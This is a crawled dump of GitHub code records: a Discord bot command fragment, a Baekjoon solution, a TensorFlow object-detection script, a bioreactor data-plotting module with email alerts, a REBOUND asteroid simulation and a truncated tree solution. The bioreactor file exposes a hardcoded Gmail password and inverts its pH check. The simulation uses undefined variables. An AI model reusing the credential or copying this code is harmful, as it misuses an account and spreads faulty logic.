ctx.send(\"What do you want to store?\")\n else:\n await ctx.send(f\"`{data}` has been stored.\")\n stored = data\n else:\n await ctx.send(\"Do you want to `read` or `write`?\")\n\n\ndef setup(bot):\n # Every extension should have this function\n bot.add_command(bologna)\n","repo_name":"CatnamedFinn/Mentlebot","sub_path":"bot/commands/bologna.py","file_name":"bologna.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73852788203","text":"import sys\ninput = sys.stdin.readline\n\nif __name__ == \"__main__\":\n tryCount = int(input())\n counts = [0,1,2,4] # count for 0, 1,2,3\n for _ in range(tryCount):\n num = int(input())\n if num >= len(counts):\n for i in range(len(counts), num + 1):\n counts.append(counts[i - 1] + counts[i - 2] + counts[i - 3])\n 
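The loop above fills a tribonacci-style table: the number of ways to write n as an ordered sum of 1, 2 and 3 satisfies counts[n] = counts[n-1] + counts[n-2] + counts[n-3]. A minimal self-contained sketch of the same recurrence (note it seeds counts[0] = 1 for the empty sum, where the snippet above uses a 0 sentinel, so the values agree for n >= 1):

    def ways_to_sum(n):
        # counts[k] = number of ordered sums of 1, 2 and 3 totalling k
        counts = [1, 1, 2]  # k = 0, 1, 2
        for i in range(3, n + 1):
            counts.append(counts[i - 1] + counts[i - 2] + counts[i - 3])
        return counts[n]

    # Worked check for n = 4: 1+1+1+1, three orders of 1+1+2,
    # two orders of 1+3, and 2+2 give 7 ways in total.
    assert ways_to_sum(4) == 7
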
print(counts[num])","repo_name":"HyunwooKoh/CodingTest","sub_path":"baekjoon/silver3/sol_9095.py","file_name":"sol_9095.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70977049004","text":"# %%\n# For running inference on the TF-Hub module.\nimport tensorflow as tf\nimport pandas as pd\nimport tensorflow_hub as hub\n\n# For downloading the image.\nimport matplotlib.pyplot as plt\nimport tempfile\nfrom six.moves.urllib.request import urlopen\nfrom six import BytesIO\nimport json\n\n# For drawing onto the image.\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageColor\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom PIL import ImageOps\n\nimport imutils\nimport cv2\n\n# For measuring the inference time.\n#import time\n\nfrom tqdm import tqdm\ntqdm.pandas()\n\n# Print Tensorflow version\nprint(tf.__version__)\n\n# Check available GPU devices.\nprint(\"The following GPU devices are available: %s\" % tf.test.gpu_device_name())\n\nmodule_handle = \"https://tfhub.dev/google/faster_rcnn/openimages_v4/inception_resnet_v2/1\" \ndetector = hub.load(module_handle).signatures['default']\n\n# %%\n# Helper functions for downloading images and for visualization.\n# Visualization code adapted from TF object detection API for the simplest required functionality.\ndef display_image(image):\n fig = plt.figure(figsize=(20, 15))\n plt.grid(False)\n plt.imshow(image)\n\n\ndef download_and_resize_image(url, new_width=256, new_height=256,\n display=False):\n _, filename = tempfile.mkstemp(suffix=\".jpg\")\n response = urlopen(url)\n image_data = response.read()\n image_data = BytesIO(image_data)\n pil_image = Image.open(image_data)\n \n open_cv_image = np.array(pil_image)\n h,w,c = open_cv_image.shape\n if h/480 total_display_str_height:\n text_bottom = top\n else:\n text_bottom = top + total_display_str_height\n # Reverse list and print from bottom to top.\n for display_str in display_str_list[::-1]:\n bbox = font.getbbox(display_str)\n text_width, text_height = bbox[2], bbox[3]\n margin = np.ceil(0.05 * text_height)\n draw.rectangle([(left, text_bottom - text_height - 2 * margin),\n (left + text_width, text_bottom)],\n fill=color)\n draw.text((left + margin, text_bottom - text_height - margin),\n display_str,\n fill=\"black\",\n font=font)\n text_bottom -= text_height - 2 * margin\n\n\ndef draw_boxes(image, boxes, class_names, scores, max_boxes=20, min_score=0.1):\n \"\"\"Overlay labeled boxes on an image with formatted scores and label names.\"\"\"\n colors = list(ImageColor.colormap.values())\n\n font = ImageFont.load_default()\n\n for i in range(min(boxes.shape[0], max_boxes)):\n if scores[i] >= min_score:\n ymin, xmin, ymax, xmax = tuple(boxes[i])\n display_str = \"{}: {}%\".format(class_names[i].decode(\"ascii\"),\n int(100 * scores[i]))\n color = colors[hash(class_names[i]) % len(colors)]\n image_pil = Image.fromarray(np.uint8(image)).convert(\"RGB\")\n draw_bounding_box_on_image(\n image_pil,\n ymin,\n xmin,\n ymax,\n xmax,\n color,\n font,\n display_str_list=[display_str])\n np.copyto(image, np.array(image_pil))\n return image\n\n\ndef load_img(path):\n img = tf.io.read_file(path)\n img = tf.image.decode_jpeg(img, channels=3)\n return img\n \n\n# %%\ndef run_detector(detector, path):\n img = load_img(path)\n\n converted_img = tf.image.convert_image_dtype(img, tf.float32)[tf.newaxis, ...]\n #start_time = time.time()\n result = detector(converted_img)\n #end_time = 
time.time()\n\n result = {key:value.numpy() for key,value in result.items()}\n\n #print(\"Found %d objects.\" % len(result[\"detection_scores\"]))\n #print(\"Inference time: \", end_time-start_time)\n\n image_with_boxes = draw_boxes(\n img.numpy(), result[\"detection_boxes\"],\n result[\"detection_class_entities\"], result[\"detection_scores\"])\n\n boxes = result['detection_boxes']\n min_score=0.1\n scores = result['detection_scores']\n class_names = result['detection_class_entities']\n\n objects_detected = pd.DataFrame()\n\n for i in range(boxes.shape[0]):\n if scores[i] >= min_score:\n #ymin, xmin, ymax, xmax = tuple(boxes[i])\n objects_detected = pd.concat([objects_detected, pd.DataFrame({'object':[class_names[i].decode(\"ascii\")], 'score':[int(100 * scores[i])]})])\n \n # display_image(image_with_boxes)\n return result, objects_detected\n \n\n# %%\nimage_urls = [\n # Source: https://commons.wikimedia.org/wiki/File:The_Coleoptera_of_the_British_islands_(Plate_125)_(8592917784).jpg\n \"https://upload.wikimedia.org/wikipedia/commons/1/1b/The_Coleoptera_of_the_British_islands_%28Plate_125%29_%288592917784%29.jpg\",\n # By Américo Toledano, Source: https://commons.wikimedia.org/wiki/File:Biblioteca_Maim%C3%B3nides,_Campus_Universitario_de_Rabanales_007.jpg\n \"https://upload.wikimedia.org/wikipedia/commons/thumb/0/0d/Biblioteca_Maim%C3%B3nides%2C_Campus_Universitario_de_Rabanales_007.jpg/1024px-Biblioteca_Maim%C3%B3nides%2C_Campus_Universitario_de_Rabanales_007.jpg\",\n # Source: https://commons.wikimedia.org/wiki/File:The_smaller_British_birds_(8053836633).jpg\n \"https://upload.wikimedia.org/wikipedia/commons/0/09/The_smaller_British_birds_%288053836633%29.jpg\",\n ]\n\ndef detect_img(image_url):\n #start_time = time.time()\n image_path = download_and_resize_image(image_url, 640, 480, True)\n result, df = run_detector(detector, image_path)\n #end_time = time.time()\n #print(\"Inference time:\",end_time-start_time)\n try:\n return df['object'].unique()\n except:\n return None\n\ndef detect_img1(image_url):\n #start_time = time.time()\n image_path = download_and_resize_image1(image_url, 640, 480, False)\n result, df = run_detector(detector, image_path)\n #end_time = time.time()\n #print(\"Inference time:\",end_time-start_time)\n try:\n return df['object'].unique()\n except:\n return None\n\n# %%\n# df1 = pd.read_pickle('final_df.pkl').reset_index(drop=True)\n# df1['image_filename'] = df1['image_filename'].apply(lambda x: x.split('/')[-1])\n\n# f = open('gcp_results.json')\n# data = json.load(f)\n\n# # set objects and labels\n# df1['objects'] = None\n# df1['labels'] = None\n# for i in range(df1['image_filename'].shape[0]):\n# object_data = set([filename['name'] for filename in data[df1.iloc[i]['image_filename']]['Objects']])\n# labels_data = set(data[df1.iloc[i]['image_filename']]['Labels'])\n# df1.loc[i, 'objects'] = str(object_data)\n# df1.loc[i, 'labels'] = str(labels_data)\n\n# %%\ndf = pd.read_pickle('final_objects3.pkl')\n\n# %%\n#df1['frcnn_objects'] = None\nfor i in tqdm(range(df['image_filename'].shape[0])):\n df.loc[i, 'frcnn_objects'] = str(detect_img(df['primaryImageURL'].iloc[i]))\n #df.to_pickle('final_objects4.pkl')\n\n# %%\nimport pandas as pd\ndf = pd.read_pickle('final_objects4.pkl')\n# %%\ni=1\ni=120\ni=130\ni=270\ni=360\ni=4298\ni=6782\ni=7590\ni=8001\nurl = df['primaryImageURL'].iloc[i]\nprint('new frcnn:', detect_img(url))\nprint('old frcnn:', detect_img1(url))\nprint('Vision Objects:', df['objects'].iloc[i])\nprint('Vision Labels:', df['labels'].iloc[i], 
'\\n')\nprint(df['frcnn_objects'].iloc[i])\n","repo_name":"AbhinavJhanwar/object-detection-classification","sub_path":"frcnn/tensorflow_based_frcnn.py","file_name":"tensorflow_based_frcnn.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29437216523","text":"from datetime import datetime\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\nfrom collections import deque\nfrom mailMIME import BioreactorGmailBot\nimport random\nimport os\nimport csv\nimport threading\nimport shutil\nimport json\n\nclass TwoLiveData:\n def __init__(self, parent):\n \"\"\" Initiates the live data visualisation tool.\n This tool will create two live graphs stacked on top of each other, and will continuously update both graphs as long as there's\n a constant stream of input data.\n Additionally, it will save all incoming data to .csv file in a dedicated directory.\n It also has a backend email bot that will send an email to relevant stakeholders when readings reach/exceed\n a certain threshold.\n \"\"\"\n self.fig, self.ax = plt.subplots(2) # Draws two boxes (for graphs)\n self.tubes = [{} for _ in range(6)]\n self.parent = parent\n self.tube_statuses = self.parent.get_tube_statuses()\n self.load_settings() # Loads\n self.now = datetime.now()\n\n # Logging into Gmail...\n # Needed for the email bot to work.\n self.mail_bot = BioreactorGmailBot(parent, \"bioreactor.bot@gmail.com\", \"75q3@*NyiVDKmr_k\")\n\n # Clear everything in data.\n #for i in os.listdir(\"data\"):\n # os.remove(os.path.join(\"data\", i))\n\n def gen_data(self):\n \"\"\" Generates random data\n *Used for testing purposes\n namely for reading and recording data.\n\n Return\n ------\n A list of values (Strings) that will be stored as a row in the final .csv file.\n \"\"\"\n return [datetime.now().strftime(\"%H:%M:%S\"), random.randint(6,9), random.randint(29, 31)]\n\n def animate(self, i):\n \"\"\" Called once every frame to update graph by creating a new one, creating the illusion of live-data.\n Since this function is executed one per tick (can be set to an arbitrary period of time like a second...), many\n things are done per tick:\n 1. Reading/generating data\n 2. Check time & and delete old files if need be.\n 3. Check data thresholds and send emails to relevant stakeholders if need be.\n 4. Save data.\n 5. Plot data.\n Parameter\n ---------\n i (?): Don't know, but it's needed for FuncAnimation though.\n \"\"\"\n\n # Actual sensor input here\n # Currently, I'm using randomly generated values. Feel free to replace those when sensors work.\n ph = [random.randint(6,9) for _ in self.tubes] # Need to generate a list with the length equal\n # to the maximum number of tubes. For tube numbers that will turned off/not being monitored, just use any dummy\n # value.\n # When attaching hardware code, make sure you store your data like this. If a sensor is turned off, just use\n # a dummy value such as 0 to maintain the same list structure. 
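A hedged sketch of the fixed-length convention just described — one slot per tube, with a dummy 0 for tubes that are switched off so the list shape never changes (read_sensor here is a hypothetical stand-in for the real hardware call):

    def collect_readings(tube_statuses, read_sensor):
        # Keep one entry per tube; offline tubes get a dummy 0
        # that the rest of the system never reads.
        return [read_sensor(i) if status else 0
                for i, status in enumerate(tube_statuses)]

    # Example: tubes 1 and 3 online, the other four off.
    statuses = [True, False, True, False, False, False]
    print(collect_readings(statuses, lambda i: 7.0 + i))  # [7.0, 0, 9.0, 0, 0, 0]
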
That dummy value won't be read by the system.\n temperature = [random.random()*3+28 for _ in self.tubes]\n\n # Recording time\n now = datetime.now()\n time = now.strftime(\"%H:%M:%S\")\n\n directory = os.path.join(\"data\", now.strftime(\"%d-%m-%Y\"))\n\n new_day = not os.path.isdir(directory)\n # If we're in a new day, create a new directory with the date as its name.\n if new_day:\n os.mkdir(directory)\n\n for i in range(len(self.tubes)):\n if self.tube_statuses[i]:\n tube_dir = os.path.join(directory, f\"tube{i+1}.csv\")\n new_file = not os.path.isfile(tube_dir)\n with open(tube_dir, \"a+\", newline='', encoding=\"utf-8\") as seesv:\n writer = csv.writer(seesv)\n # Check and see if this new .csv file already exists\n if new_file: # If it doesn't exist, append heading\n writer.writerow([\"Time\", \"pH\", \"Temperature\"])\n # Remove the oldest file:\n # Taken from: https://stackoverflow.com/questions/47739262/find-remove-oldest-file-in-directory\n list_of_files = os.listdir('data')\n if len(list_of_files) >= int(data_life[self.settings[\"data_life\"]]):\n oldest_file = min(list_of_files, key=os.path.getctime)\n shutil.rmtree(os.path.abspath(oldest_file))\n writer.writerow([time, ph[i], temperature[i]]) # Append new data\n\n\n \"\"\"\n self.mail_bot.conditional_send_to_all(\n \"Too Hot!\",\n \"At least one of your tubes are overheating\",\n overheating_tubes,\n temperature,\n auto_heading=True,\n attach_file= [os.path.join(directory, f\"tube{i+1}.csv\") if self.tube_statuses[i] else 0 for i in range(len(self.tube_statuses))],\n )\n \"\"\"\n \"\"\" Sending an email with threading\n # Delay times are inconsistent, but are quite short. \n # Also requires a multi-core machine to run.\n \n mail_thread = threading.Thread(target=self.mail_bot.conditional_send,\n args = (\"liset73655@zefara.com\",\n \"Too hot!!!\",\n \"Wow! It's {}°C in Melbourne!\",\n lambda x: x[0] > 30,\n genY),\n kwargs={\"auto_parse\":True,\n \"attach_file\": os.path.join(\"data\", self.today+\".csv\")},\n daemon=True)\n \n mail_thread.start()\n \n \"\"\"\n \"\"\" Sending an email without threading.\n # Delay times are consistent, but are quite long.\n\n self.mail_bot.conditional_send(\"liset73655@zefara.com\",\n \"Too hot!!!\",\n \"Wow! It's {}°C in Melbourne!\",\n lambda x: x[0] > 30,\n genY,\n auto_parse=True,\n attach_file=os.path.join(\"data\", self.today+\".csv\"))\n \"\"\"\n\n # In practice:\n mail_thread_temperature = threading.Thread(target=self.mail_bot.conditional_send_to_all,\n args = (\"Tube threshold exceeded!!!\",\n \"At least one of your tubes are overheating or have bad pH levels. 
Please check the attached \"\n \".csv file(s).\",\n ph_temp,\n ph,\n temperature\n ),\n kwargs={\"auto_heading\":True,\n \"auto_parse\":False,\n \"attach_file\": [os.path.join(directory, f\"tube{i+1}.csv\") if self.tube_statuses[i] else 0 for i in range(len(self.tube_statuses))]\n },\n #daemon=True\n )\n\n mail_thread_temperature.start()\n\n\n\n # Clear previously graphed data:\n for axe in self.ax:\n axe.clear()\n axe.grid(axis='y')\n\n plt.rc('grid', linestyle=':', linewidth=1)\n\n # Adding newly produced/read data to prepare for data visualisation.\n self.times.append(time)\n for i in range(len(self.tubes)):\n if self.tube_statuses[i]:\n tube = self.tubes[i]\n if not tube:\n self.update_tube(tube)\n tube[\"ph\"].append(ph[i])\n tube[\"temperature\"].append(temperature[i])\n self.ax[0].plot(self.times, tube[\"ph\"], c=colours[i-1] ,label=f\"Tube {i+1}\")\n self.ax[1].plot(self.times, tube[\"temperature\"], c=colours[i-1], label=f\"Tube {i+1}\")\n self.ax[0].legend(title=\"pH\", loc=\"upper left\")\n self.ax[1].legend(title=\"Temperature\", loc=\"upper left\")\n\n\n self.ax[0].set(ylabel=\"pH\")\n self.ax[1].set(xlabel=\"Time\", ylabel=\"°C\")\n\n\n plt.setp(self.ax[0].get_xticklabels(), visible=False)\n\n\n def animator(self, interval=1000):\n \"\"\" Called to animate the live graph. It just has to exist somewhere in run-time as a variable.\n\n Parameter\n ---------\n interval (Int, optional): Determines the frame update rate (milliseconds).\n\n Return\n ------\n FuncAnimation\n \"\"\"\n\n return animation.FuncAnimation(self.fig, self.animate, interval=self.translate_interval(self.settings[\"read_interval\"]))\n #self.animater = animation.FuncAnimation(self.fig, self.animate, interval=read_interval[self.settings[\"read_interval\"]])\n\n def load_settings(self):\n \"\"\" Loads settings data from data_settings.json\n Also creates an (settings) image of each tube.\n \"\"\"\n #print(\"Load Settings called\")\n settings_path = os.path.join(\"assets\", \"settings\",\"data_settings.json\")\n #if os.path.isfile(settings_path): # Checks and sees if there's a pre-existing settings file.\n with open(settings_path) as f: # If so, load its content as its settings\n self.settings = json.load(f)\n # These are temporary randomly generated data points. They will be replaced by actual data points soon.\n self.times = deque([], int(self.settings[\"data_points\"]))\n\n for i, tube in enumerate(self.tubes):\n if self.tube_statuses[i]:\n self.prepare_new_tube(tube)\n\n\n def update_data_settings(self, settings):\n \"\"\" Sets the current data setting to the input setting\n Also updates tube settings to reflect on this change.\n :param settings: a dictionary with the settings that we want.\n \"\"\"\n self.settings = settings\n self.tube_statuses = self.parent.get_tube_statuses()\n self.times = deque(self.times, int(self.settings[\"data_points\"]))\n for i, tube in enumerate(self.tubes):\n if not self.tube_statuses[i]:\n tube.clear()\n else:\n self.update_tube(tube)\n\n def update_settings(self, settings):\n \"\"\" Sets the current data setting to the input setting\n :param settings: a dictionary with the settings that we want.\n \"\"\"\n self.settings = settings\n\n def translate_interval(self, key):\n \"\"\" Translates settings value from string to int.\n In the bioreactor data settings page, there are drop down boxes with options such as '1sec', '1day', etc. 
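For illustration, read_interval.json is assumed to map those drop-down labels straight to integer millisecond periods for FuncAnimation; a guessed shape (the real mapping ships in assets/settings/read_interval.json and may differ):

    # Hypothetical contents of read_interval.json -- an assumption,
    # not the actual file.
    read_interval = {"1sec": 1000, "1min": 60000, "1day": 86400000}

    def translate_interval(key):
        return read_interval[key]

    print(translate_interval("1sec"))  # 1000 ms between animation frames
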
They\n need to be translated to integers to reflect on these times.\n :param key: a string that'll be used to get the integer value that will reflect on it.\n :return: an integer that reflects on the value that the key is referring to.\n \"\"\"\n return read_interval[key]\n\n def prepare_new_tube(self, tube):\n \"\"\" Initialises a tube deque\n Used for plotting data for a specific tube. The length is determined by the pre-loaded settings.\n :param tube: a dictionary that represents the settings used by a particular tube.\n \"\"\"\n tube[\"ph\"] = deque([], int(self.settings[\"data_points\"]))\n tube[\"temperature\"] = deque([], int(self.settings[\"data_points\"]))\n # To add more parameters, just follow the following template:\n # tube[PARAMETER] = deque([], int(self.settings[PARAMETER]))\n # PARAMETER needs to be a valid setting in ...\n\n def update_tube(self, tube):\n \"\"\" Updates a specific tube.\n If the tube exists, update it with updated settings, otherwise, create a new tube.\n :param tube: a dictionary that represents the settings used by a particular tube.\n :return:\n \"\"\"\n if tube:\n tube[\"ph\"] = deque(tube[\"ph\"], int(self.settings[\"data_points\"]))\n tube[\"temperature\"] = deque(tube[\"temperature\"], int(self.settings[\"data_points\"]))\n else:\n tube[\"ph\"] = deque([0 for _ in self.times], int(self.settings[\"data_points\"]))\n tube[\"temperature\"] = deque([0 for _ in self.times], int(self.settings[\"data_points\"]))\n\n def update_tube_status(self, tube_no, status):\n \"\"\" Updates the status of a particular tube.\n The status refers to whether or not the tube is online or offline.\n :param tube_no: the tube number of a particular tube.\n :param status: a boolean.\n \"\"\"\n self.tube_statuses[tube_no-1] = status\n\n def tube_clear(self, tube_no):\n \"\"\" Clears all data recorded on a specific tube.\n :param tube_no: an integer allocated to each tube. 
Ranges from 1-6.\n \"\"\"\n self.tubes[tube_no-1] = {\"ph\":deque([],int(self.settings[\"data_points\"])),\n \"temperature\":deque([],int(self.settings[\"data_points\"]))}\n\ndef overheating_tubes(temperatures, threshold=30):\n \"\"\" Checks to see if input temperatures exceed the threshold.\n :param temperatures: a list of numbers representing temperature.\n :param threshold: the threshold number.\n :return: a list of boolean that determines whichever tube is overheating or not.\n \"\"\"\n #print(temperatures)\n return [temp > threshold for temp in temperatures]\n\ndef bad_ph_tubes(phs, lower_threshold=7, upper_threshold=8):\n \"\"\" Same as overheating_tubes, but for pH.\n :param phs: a list of numbers representing pH.\n :param lower_threshold: the lower threshold number.\n :param upper_threshold: the upper threshold number.\n :return: a list of boolean that determines whichever tube is has a pH outside of its ideal range.\n \"\"\"\n return [lower_threshold <= ph <= upper_threshold for ph in phs]\n\ndef ph_temp(ph, temp):\n \"\"\" Checks both temperature and pH\n Outputs True for a particular if the tube has bad pH, overheated, or both\n :param ph: a list of numbers representing pH.\n :param temp: a list of numbers representing temperature.\n :return: a list of boolean that determines whichever tube is overheating, has a bad pH level, or both.\n \"\"\"\n t = overheating_tubes(temp)\n p = bad_ph_tubes(ph)\n return [t[i] or p[i] for i in range(len(t))]\n# Converts data life keys to actual integer values.\nwith open(os.path.join(\"assets\", \"settings\", \"data_life.json\")) as f:\n data_life = json.load(f)\n# Converts read interval keys to actual integer values.\nwith open(os.path.join(\"assets\", \"settings\", \"read_interval.json\")) as f:\n read_interval = json.load(f)\n\n# More colours at: https://matplotlib.org/stable/gallery/color/named_colors.html\ncolours = [\"cyan\", \"lime\", \"fuchsia\", \"gold\", \"navy\", \"teal\"]\n\nif __name__ == \"__main__\":\n producer = TwoLiveData()\n ani = producer.animator()\n plt.show()\n\n","repo_name":"Fresh-Broccoli/bms","sub_path":"two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":15109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10413071154","text":"# %%\nimport rebound\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import fsolve\nfrom timeit import default_timer as timed\n\n\ng = 6.67428e-11 # gravitational constanct in SI units\nau = 1.496e11 # astronomical unit \nmsun = 1.9891e30 # mass of sun\ns1, s2 = 100e3, 100e3 # radius of primary and of secondary\ndens = 700. # density of primary, secondary, and impactor \nm1 = 4./3.*np.pi*dens*s1**3 # mass of primary calculated from density and radius\nm2 = 4./3.*np.pi*dens*s2**3 # mass of secondary calculated from density and radius\nrsun = 44.*au # distance of centre of mass of binary from the sun \nrhill = rsun*(m1/msun/3.)**(1./3.) 
# Hill radius of primary\n\na = 0.2*rhill # separation of binary\ne = 0\n\nt = 2.*np.pi/np.sqrt(g*msun/rsun**3) # orbital period of binary around the sun\ntotaltime = t*2\nnoutputs = 1000 # number of outputs for plotting\ntimes = np.linspace(0,totaltime, noutputs) # create times for integrations\np, s, imp = np.zeros((noutputs, 3)), np.zeros((noutputs, 3)), np.zeros((noutputs, 3))\nvp, vs, vimp = np.zeros((noutputs, 3)), np.zeros((noutputs, 3)), np.zeros((noutputs, 3))\n\n# header for pandas dataframe\nheaders = ['time','b',\n 'hash prim','mass prim','radius prim','x prim','y prim','z prim','vx prim','vy prim','vz prim',\n 'hash sec','mass sec','radius sec','x sec','y sec','z sec','vx sec','vy sec','vz sec',\n 'hash imp','mass imp','radius imp','x imp','y imp','z imp','vx imp','vy imp','vz imp',]\n\ncoll_headers = ['time','body','r','m','x','y','z','vx','vy','vz']\n\nsim_name = \"chaos_thesis_test\"\n\n# simp = np.arange(50e3,210e3,50e3) # create range of impactor sizes to loop through\n# b = np.arange(2,6.1,1) # create range of impact parameters to loop through\n\nsimp = np.ones(5)*100e3\nb = np.ones(1)*3\n\n\ntimer = timed() # start timer to time simulations\n\nfor j in range(len(b)): # loop through each impact parameter\n for i in range(len(simp)): # loop throught each impactor radius\n print('step ' + str(j + 1) + '-' + str(i+1))\n bhill = b[j]*rhill # impact parameter\n mimp = 4./3.*np.pi*dens*simp[i]**3 # mass of impactor\n theta = 0.0015 # true anomaly of impactor\n inc_imp = np.random.rayleigh(2)\n e_imp = np.random.rayleigh(0.05)\n \n e = np.random.uniform()*0.5\n inc = np.random.uniform()*2*np.pi\n omega = np.random.uniform()*2*np.pi\n Omega = np.random.uniform()*2*np.pi\n # inc = 0\n # omega = 0\n # Omega = 0\n # f = np.random.uniform()*2*np.pi\n \n # n_bin = np.sqrt(g*msun/rsun)**3 # mean motion of binary COM\n # n_imp = np.sqrt(g*msun/(rsun+bhill))**3 # mean motion of impactor\n \n \n # f_enc = np.arccos((rsun+b)*(1-e_imp**2)/(e_imp*(rsun+b)) - 1/e_imp) # angle at which close encounter occurs\n f_enc = np.arccos(-e_imp) # always needs to be in second quadrant\n # E = np.arctan( np.sqrt(1-e_imp**2) * np.sin(f_enc) / (e_imp + np.cos(f_enc)) ) # E at encounter \n E = np.arctan2( np.sqrt(1-e_imp**2) * np.sin(f_enc), e_imp + np.cos(f_enc))\n M = E - e_imp*np.sin(E) # mean anomaly at encounter\n t_enc = np.pi/n_bin # time it takes for binary COM to get to crossover point\n M_0 = n_imp*-t_enc + M # mean anomaly at start of sim\n \n def func(x):\n return x-e_imp*np.sin(x) - M_0\n \n E_0 = fsolve(func, 1)\n \n # f_0 = np.arccos( (np.cos(E_0) - e_imp) / (1 - e_imp*np.cos(E_0)) )\n \n f_0 = 2 * np.arctan2( np.sqrt(1+e_imp)*np.sin(E_0/2) , np.sqrt(1-e_imp)*np.cos(E_0/2) )\n \n def setupSimulation():\n sim = rebound.Simulation() # initialize rebound simulation\n sim.G = g # set G which sets units of integrator - SI in this case\n sim.collision = 'direct'\n sim.add(m=m1, r=s1, hash=\"primary\")\n sim.add(m=m2, r=s2, a=a, e=e, inc=inc, omega=omega, Omega=Omega, f=f, hash=\"secondary\")\n sim.add(m=msun, a=rsun, f=np.pi, hash=\"sun\")\n sim.move_to_com()\n sim.add(m=mimp, r=simp[i], a=rsun+bhill, f=theta, hash=\"impactor\")\n # sim.add(m=mimp, r=simp[i], a=rsun+bhill, e=e_imp, omega=np.pi-f_enc, f=f_0, inc=inc_imp, Omega=0, hash=\"impactor\")\n return sim\n \n sim = setupSimulation()\n ps = sim.particles # create variable containing particles in simulation\n all_ps = [p.hash.value for j, p in enumerate(ps)]\n \n ps1 = ps[\"primary\"].index\n ps2 = ps[\"secondary\"].index\n ps3 = 
ps[\"impactor\"].index\n \n try:\n for k, time in enumerate(times):\n sim.integrate(time)\n # print(k)\n p[k] = [ps[\"primary\"].x, ps[\"primary\"].y, ps[\"primary\"].z]\n s[k] = [ps[\"secondary\"].x, ps[\"secondary\"].y, ps[\"secondary\"].z]\n imp[k] = [ps[\"impactor\"].x, ps[\"impactor\"].y, ps[\"impactor\"].z]\n vp[k] = [ps[\"primary\"].vx, ps[\"primary\"].vy, ps[\"primary\"].vz]\n vs[k] = [ps[\"secondary\"].vx, ps[\"secondary\"].vy, ps[\"secondary\"].vz]\n vimp[k] = [ps[\"impactor\"].vx, ps[\"impactor\"].vy, ps[\"impactor\"].vz]\n except rebound.Collision:\n print('collision detected')\n collided = []\n for item in sim.particles:\n if item.lastcollision == sim.t:\n collided.append([sim.t, item.index, item.r, item.m, item.x, item.y, item.z, item.vx, item.vy, item.vz])\n collided = np.array(collided) \n df_coll = pd.DataFrame(collided)\n df_coll.to_csv(f'./thesis_results/collision_{sim_name}_{np.round(simp[i]/1e3, 1)}_{np.round(b[j], 1)}.csv', header=coll_headers)\n #df_coll.to_csv(f'./thesis_results/collision_{sim_name}_{i}.csv', header=coll_headers)\n \n sim.collision_resolve = 'merge'\n \n for k, time in enumerate(times):\n sim.integrate(time)\n existing_ps = [p.hash.value for j, p in enumerate(ps)]\n if all_ps[0] in existing_ps:\n p[k] = [ps[\"primary\"].x, ps[\"primary\"].y, ps[\"primary\"].z]\n vp[k] = [ps[\"primary\"].vx, ps[\"primary\"].vy, ps[\"primary\"].vz]\n if all_ps[1] in existing_ps:\n s[k] = [ps[\"secondary\"].x, ps[\"secondary\"].y, ps[\"secondary\"].z]\n vs[k] = [ps[\"secondary\"].vx, ps[\"secondary\"].vy, ps[\"secondary\"].vz]\n if all_ps[3] in existing_ps:\n imp[k] = [ps[\"impactor\"].x, ps[\"impactor\"].y, ps[\"impactor\"].z]\n vimp[k] = [ps[\"impactor\"].vx, ps[\"impactor\"].vy, ps[\"impactor\"].vz]\n \n \n # create matrix of results in same order as header created above - reshape some to avoid error\n particles = np.hstack((np.reshape(times,(noutputs,1)),\n np.reshape(np.ones(noutputs)*b[j]/rhill,(noutputs,1)),\n np.reshape(np.ones(noutputs)*ps1, (noutputs,1)),\n np.reshape(np.ones(noutputs)*m1, (noutputs,1)),\n np.reshape(np.ones(noutputs)*s1, (noutputs,1)),\n p,\n vp,\n np.reshape(np.ones(noutputs)*ps2, (noutputs,1)),\n np.reshape(np.ones(noutputs)*m2, (noutputs,1)),\n np.reshape(np.ones(noutputs)*s2, (noutputs,1)),\n s,\n vs,\n np.reshape(np.ones(noutputs)*ps3, (noutputs,1)),\n np.reshape(np.ones(noutputs)*mimp,(noutputs,1)),\n np.reshape(np.ones(noutputs)*simp[i],(noutputs,1)),\n imp,\n vimp))\n \n df = pd.DataFrame(particles)\n \n df.to_csv(f'./thesis_results/{sim_name}_{np.round(simp[i]/1e3, 1)}_{np.round(b[j], 1)}.csv', header=headers)\n #df.to_csv(f'./thesis_results/{sim_name}_{i}.csv', header=headers)\n \nprint(timed()-timer) # finish timer","repo_name":"Johngn/binaries","sub_path":"main_sim.py","file_name":"main_sim.py","file_ext":"py","file_size_in_byte":8592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74137825003","text":"def find_parent(child, c_parent):\n if parent[child]:\n c_parent.append(parent[child])\n find_parent(parent[child], c_parent)\n\n\ndef find_cp(c1_p, c2_p):\n for p1 in c1_p:\n for p2 in c2_p:\n if p1 == p2:\n return p1\n\n\ndef subtree(start):\n global sub_cnt\n if left[start]:\n sub_cnt += 1\n subtree(left[start])\n if right[start]:\n sub_cnt += 1\n subtree(right[start])\n\n\nT = int(input())\nfor tc in range(1, T+1):\n V, E, c1, c2 = map(int, input().split())\n left = [0]*(V+1)\n right = [0]*(V+1)\n parent = [0]*(V+1)\n edge = list(map(int, input().split()))\n for i 
